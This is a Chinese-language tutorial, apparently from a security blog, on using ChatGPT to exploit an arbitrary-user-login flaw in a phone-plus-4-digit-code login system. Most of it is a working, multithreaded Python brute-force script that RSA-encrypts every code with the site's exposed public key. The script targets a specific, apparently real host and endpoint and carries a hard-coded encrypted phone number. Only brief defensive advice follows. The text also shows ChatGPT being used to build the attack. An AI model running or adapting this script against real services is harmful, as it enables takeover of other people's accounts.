ChatGPT辅助挖掘任意用户登录漏洞实战教学<\/h1>

0x01 漏洞背景<\/h2>

本案例研究的是一个基于"手机号+4位验证码"的登录系统漏洞，该系统存在以下安全缺陷：<\/p>

验证码长度仅为4位，可爆破（10000种可能性）<\/li>
验证码参数在传输过程中使用RSA加密<\/li>

前端暴露了RSA公钥<\/li> <\/ul>

0x02 漏洞分析<\/h2>

关键发现点<\/h3>

验证码可爆破性<\/strong>：4位验证码仅有10000种组合，在合理时间内可完成爆破<\/li>
加密方式分析<\/strong>：从请求包观察，加密样式符合RSA特征<\/li>

前端暴露公钥<\/strong>：通过搜索"encrypt"关键词可找到RSA公钥<\/li> <\/ol>
攻击面分析<\/h3>
攻击者需要：<\/p>

获取加密算法实现方式<\/li>
构造有效的加密请求<\/li>
实现自动化爆破流程<\/li> <\/ol>
0x03 漏洞利用步骤<\/h2>
第一步：获取加密公钥<\/h3>

在浏览器开发者工具中搜索"encrypt"或"rsa"关键词<\/li>
定位到类似以下公钥：<\/li> <\/ol>
-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEYtvVnsDwdVPutk7t7BVARBbk 00h0l+tSjtKswncCpM9CcebzIsWvLtdnQdDu1ABuW1GziaU1XSQixKcFH9HiIfj cM0+DoqNEXXH8sLIkIbz1g1ajA\/6N6oL6Guq+w\/u9lV5TChRVnE7Lo5Z2aFxTNv +Z5psTON8v+akXpUIHwIDAQAB -----END PUBLIC KEY----- <\/code><\/pre> 第二步：构造加密请求<\/h3> 使用Python的cryptography库实现RSA加密：<\/p> from<\/span> cryptography.hazmat.primitives.asymmetric import<\/span> rsa, padding <\/span><\/span>from<\/span> cryptography.hazmat.primitives import<\/span> serialization, hashes <\/span><\/span>import<\/span> base64 <\/span><\/span> <\/span><\/span>public_key_pem =<\/span> b<\/span>"""-----BEGIN PUBLIC KEY----- <\/span><\/span><\/span>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEYtvVnsDwdVPutk7t7BVARBbk <\/span><\/span><\/span>00h0l+tSjtKswncCpM9CcebzIsWvLtdnQdDu1ABuW1GziaU1XSQixKcFH9HiIfj <\/span><\/span><\/span>cM0+DoqNEXXH8sLIkIbz1g1ajA\/6N6oL6Guq+w\/u9lV5TChRVnE7Lo5Z2aFxTNv <\/span><\/span><\/span>+Z5psTON8v+akXpUIHwIDAQAB <\/span><\/span><\/span>-----END PUBLIC KEY-----"""<\/span> <\/span><\/span> <\/span><\/span>public_key =<\/span> serialization.<\/span>load_pem_public_key( <\/span><\/span> public_key_pem, <\/span><\/span> backend=<\/span>default_backend() <\/span><\/span>) <\/span><\/span> <\/span><\/span>code =<\/span> "1234"<\/span> # 示例验证码<\/span> <\/span><\/span>code_bytes =<\/span> code.<\/span>encode("utf-8"<\/span>) <\/span><\/span>cipher_bytes =<\/span> public_key.<\/span>encrypt( <\/span><\/span> code_bytes, <\/span><\/span> padding.<\/span>PKCS1v15() <\/span><\/span>) <\/span><\/span>cipher_b64 =<\/span> base64.<\/span>b64encode(cipher_bytes).<\/span>decode("utf-8"<\/span>) <\/span><\/span><\/code><\/pre>第三步：构建完整爆破脚本<\/h3> 完整利用代码（含多线程优化）：<\/p> import<\/span> requests <\/span><\/span>from<\/span> cryptography.hazmat.primitives.asymmetric import<\/span> rsa, padding <\/span><\/span>from<\/span> cryptography.hazmat.primitives import<\/span> serialization, hashes <\/span><\/span>import<\/span> base64 <\/span><\/span>from<\/span> cryptography.hazmat.backends import<\/span> default_backend <\/span><\/span>import<\/span> threading <\/span><\/span> <\/span><\/span>url =<\/span> "https:\/\/icity.shdict.com:8880\/zhcstyrz\/vue_admin\/oauth\/mobileLoginFree?_r=1690253760383"<\/span> <\/span><\/span>headers =<\/span> { <\/span><\/span> "Content-Type"<\/span>: "application\/json"<\/span>, <\/span><\/span> "Accept"<\/span>: "application\/json, text\/plain, *\/*"<\/span>, <\/span><\/span> "User-Agent"<\/span>: "Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/113.0.0.0 Safari\/537.36"<\/span>, <\/span><\/span> "Origin"<\/span>: "https:\/\/icity.shdict.com:8880"<\/span>, <\/span><\/span> "Referer"<\/span>: "https:\/\/icity.shdict.com:8880\/icity\/"<\/span>, <\/span><\/span>} <\/span><\/span> <\/span><\/span># 加载公钥<\/span> <\/span><\/span>public_key_pem =<\/span> b<\/span>"""-----BEGIN PUBLIC KEY----- <\/span><\/span><\/span>MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDEYtvVnsDwdVPutk7t7BVARBbk <\/span><\/span><\/span>00h0l+tSjtKswncCpM9CcebzIsWvLtdnQdDu1ABuW1GziaU1XSQixKcFH9HiIfj <\/span><\/span><\/span>cM0+DoqNEXXH8sLIkIbz1g1ajA\/6N6oL6Guq+w\/u9lV5TChRVnE7Lo5Z2aFxTNv <\/span><\/span><\/span>+Z5psTON8v+akXpUIHwIDAQAB <\/span><\/span><\/span>-----END PUBLIC KEY-----"""<\/span> <\/span><\/span>public_key =<\/span> serialization.<\/span>load_pem_public_key( <\/span><\/span> public_key_pem, <\/span><\/span> backend=<\/span>default_backend() <\/span><\/span>) <\/span><\/span> <\/span><\/span>def<\/span> try_codes<\/span>(start, end): <\/span><\/span> for<\/span> i in<\/span> range(start, end): <\/span><\/span> code =<\/span> str(i).<\/span>zfill(4<\/span>) <\/span><\/span> print(f<\/span>"Trying code <\/span>{<\/span>code}<\/span>"<\/span>) <\/span><\/span> <\/span><\/span> # 加密验证码<\/span> <\/span><\/span> code_bytes =<\/span> code.<\/span>encode("utf-8"<\/span>) <\/span><\/span> cipher_bytes =<\/span> public_key.<\/span>encrypt( <\/span><\/span> code_bytes, <\/span><\/span> padding.<\/span>PKCS1v15() <\/span><\/span> ) <\/span><\/span> cipher_b64 =<\/span> base64.<\/span>b64encode(cipher_bytes).<\/span>decode("utf-8"<\/span>) <\/span><\/span> <\/span><\/span> # 构造请求数据<\/span> <\/span><\/span> data =<\/span> { <\/span><\/span> "phone"<\/span>: "bq3crvUqMTHBhyy83VpMamW4mybx\/FhkTCNhKxHlmknppeihOo7drnSVjsv6qQRVj+fjbT+2za9Qed\/vgI\/Hh+o6I2q7x3FEpsnA7h6Wjt+BQbcqTPMX7JlHksfe8ARcBz+KFYseoXxbgU59Bru4lV18pOKrMlAqHpV3B0yicNA="<\/span>, <\/span><\/span> "code"<\/span>: cipher_b64, <\/span><\/span> "loginType"<\/span>: 0<\/span>, <\/span><\/span> "forceLogin"<\/span>: 1<\/span>, <\/span><\/span> "clientId"<\/span>: "icity"<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> # 发送请求<\/span> <\/span><\/span> response =<\/span> requests.<\/span>post(url, headers=<\/span>headers, json=<\/span>data) <\/span><\/span> <\/span><\/span> # 检查响应<\/span> <\/span><\/span> if<\/span> "4018"<\/span> not<\/span> in<\/span> str(response.<\/span>json()): <\/span><\/span> print(f<\/span>"Success! Code <\/span>{<\/span>code}<\/span> is valid."<\/span>) <\/span><\/span> print(response.<\/span>json()) <\/span><\/span> break<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> print(f<\/span>"Code <\/span>{<\/span>code}<\/span> is not valid."<\/span>) <\/span><\/span> <\/span><\/span># 创建10个线程并行爆破<\/span> <\/span><\/span>threads =<\/span> [] <\/span><\/span>for<\/span> i in<\/span> range(10<\/span>): <\/span><\/span> start =<\/span> i *<\/span> 900<\/span> +<\/span> 1000<\/span> <\/span><\/span> end =<\/span> (i +<\/span> 1<\/span>) *<\/span> 900<\/span> +<\/span> 1000<\/span> <\/span><\/span> thread =<\/span> threading.<\/span>Thread(target=<\/span>try_codes, args=<\/span>(start, end)) <\/span><\/span> threads.<\/span>append(thread) <\/span><\/span> thread.<\/span>start() <\/span><\/span> <\/span><\/span># 等待所有线程完成<\/span> <\/span><\/span>for<\/span> thread in<\/span> threads: <\/span><\/span> thread.<\/span>join() <\/span><\/span> <\/span><\/span>print("All codes have been tried."<\/span>) <\/span><\/span><\/code><\/pre>第四步：优化与调试<\/h3> 错误处理<\/strong>：确保代码能处理各种异常情况<\/li> 性能优化<\/strong>：使用多线程加速爆破过程<\/li> 结果验证<\/strong>：通过响应中的特定标识（如"4018"）判断验证码是否正确<\/li> <\/ol> 0x04 防御建议<\/h2> 增加验证码复杂度<\/strong>：使用6位或更长验证码<\/li> 限制尝试次数<\/strong>：对同一手机号的验证码尝试次数进行限制<\/li> 加密改进<\/strong>：使用更安全的加密方案<\/li> 避免在前端暴露公钥<\/li> <\/ul> <\/li> 增加人机验证<\/strong>：引入CAPTCHA等机制<\/li> 服务端校验<\/strong>：增加时间戳、签名等二次验证<\/li> <\/ol> 0x05 总结<\/h2> 本案例展示了如何利用ChatGPT辅助完成以下工作：<\/p> 分析加密算法<\/li> 编写加密代码<\/li> 构建爆破脚本<\/li> 调试和优化代码<\/li> <\/ol> 通过自动化工具，原本需要数小时的手工操作可在几分钟内完成，极大提高了漏洞挖掘效率。同时，这也提醒开发人员需要重视验证码相关的安全设计。<\/p>